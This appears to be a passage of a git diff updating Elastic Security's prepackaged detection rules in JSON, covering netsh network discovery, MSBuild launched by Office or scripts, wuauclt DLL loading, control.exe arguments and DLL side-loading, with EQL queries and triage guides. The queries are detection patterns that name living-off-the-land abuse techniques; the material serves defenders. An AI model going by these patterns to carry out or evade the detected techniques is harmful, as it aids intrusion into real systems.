"type": "keyword" + } + ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json index 7f56edc51c96a..d1268734ac0cb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_network_discovery_with_netsh.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Enable Host Network Discovery via Netsh", - "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems\nwith this setting enabled will communicate with other systems using broadcast messages, which can be used to identify\ntargets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Enable Host Network Discovery via Netsh\n\nThe Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can enable Network Discovery on the Windows firewall to find other systems present in the same network. Systems\nwith this setting enabled will communicate with other systems using broadcast messages, which can be used to identify\ntargets for lateral movement. This rule looks for the setup of this setting using the netsh utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this configuration.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable Network Discovery:\n - Using netsh: `netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=No`\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\nprocess.name : \"netsh.exe\" and\nprocess.args : (\"firewall\", \"advfirewall\") and process.args : \"group=Network Discovery\" and process.args : \"enable=Yes\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8b4f0816-6a65-4630-86a6-c21c179c0d09", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json index 58cd10a68a612..1350d8b4f1572 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_event_hub_deletion.json @@ -14,15 +14,40 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Event Hub Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about", "https://azure.microsoft.com/en-in/services/event-hubs/", "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e0f36de1-0342-453d-95a9-a068b257b053", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json index 68e4718f79e17..11c5d99eb7d62 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_control_panel_suspicious_args.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Control Panel Process with Unusual Arguments", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.dat*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", "references": [ "https://www.joesandbox.com/analysis/476188/1/html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -38,7 +56,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json index 00adb53d10e3b..56948ace764d0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_lolbas_wuauclt.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "ImageLoad via Windows Update Auto Update Client", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", "references": [ "https://dtm.uk/wuauclt/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -38,7 +61,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -48,5 +71,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json index 8da432218fd3c..6e7cf5add5ec1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_office_app.json @@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by an Office Application", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Started by an Office Application\n\nMicrosoft Office (MS Office) is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently targeted\nfor initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML\nschema for a project file that controls how the build platform processes and builds software, and can be abused to proxy\nexecution of code.\n\nThis rule looks for the `Msbuild.exe` utility spawned by MS Office programs. This is generally the result of the\nexecution of malicious documents.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"eqnedt32.exe\",\n \"excel.exe\",\n \"fltldr.exe\",\n \"msaccess.exe\",\n \"mspub.exe\",\n \"outlook.exe\",\n \"powerpnt.exe\",\n \"winword.exe\" )\n", "references": [ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c5dc3223-13a2-44a2-946c-e9dc0aa0449c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json index 996ed0c3b9531..7dd1077d672e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_script.json @@ -15,10 +15,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by a Script Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\") and\n process.parent.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json index 3cbcc0c2baf86..d0dc1752c36fa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_by_system_process.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started by a System Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json index a92e7949b45d5..48b0bc0b86814 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_renamed.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json index 368035727ff10..31729915f2480 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_msbuild_started_unusal_process.json @@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Started an Unusual Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"MSBuild.exe\" and\n process.name : (\"csc.exe\", \"iexplore.exe\", \"powershell.exe\")\n", "references": [ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json index 4f7d4b166fecb..c2504f566d427 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_suspicious_explorer_winword.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential DLL SideLoading via Trusted Microsoft Programs", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.pe.original_file_name in (\"WinWord.exe\", \"EXPLORER.EXE\", \"w3wp.exe\", \"DISM.EXE\") and\n not (process.name : (\"winword.exe\", \"explorer.exe\", \"w3wp.exe\", \"Dism.exe\") or\n process.executable : (\"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files?(x86)\\\\Microsoft Office\\\\root\\\\Office*\\\\WINWORD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\Dism.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Dism.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "1160dcdb-0a0a-4a79-91d8-9b84616edebd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json index 1291ede56e2aa..be185e83d99a6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_execution_windefend_unusual_path.json @@ -16,13 +16,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n", "references": [ "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -57,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json index a97d811683d38..c922efd29c54a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_file_creation_mult_extension.json +++ 